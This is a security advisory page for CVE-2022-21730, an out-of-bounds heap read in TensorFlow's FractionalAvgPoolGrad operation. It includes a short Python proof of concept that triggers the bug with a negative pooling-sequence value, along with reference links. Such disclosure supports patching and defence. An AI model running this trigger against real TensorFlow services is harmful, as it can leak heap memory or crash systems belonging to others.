CVE-2022-21730: Out of bounds read in Tensorflow
(updated )
The implementation of FractionalAvgPoolGrad does not consider cases where the input tensors are invalid allowing an attacker to read from outside of bounds of heap:
import tensorflow as tf
@tf.function
def test():
y = tf.raw_ops.FractionalAvgPoolGrad(
orig_input_tensor_shape=[2,2,2,2],
out_backprop=[[[[1,2], [3, 4], [5, 6]], [[7, 8], [9,10], [11,12]]]],
row_pooling_sequence=[-10,1,2,3],
col_pooling_sequence=[1,2,3,4],
overlapping=True)
return y
test()
References
- github.com/advisories/GHSA-vjg4-v33c-ggc4
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2022-54.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2022-109.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/kernels/fractional_avg_pool_op.cc
- github.com/tensorflow/tensorflow/commit/002408c3696b173863228223d535f9de72a101a9
- github.com/tensorflow/tensorflow/security/advisories/GHSA-vjg4-v33c-ggc4
- nvd.nist.gov/vuln/detail/CVE-2022-21730
Detect and mitigate CVE-2022-21730 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →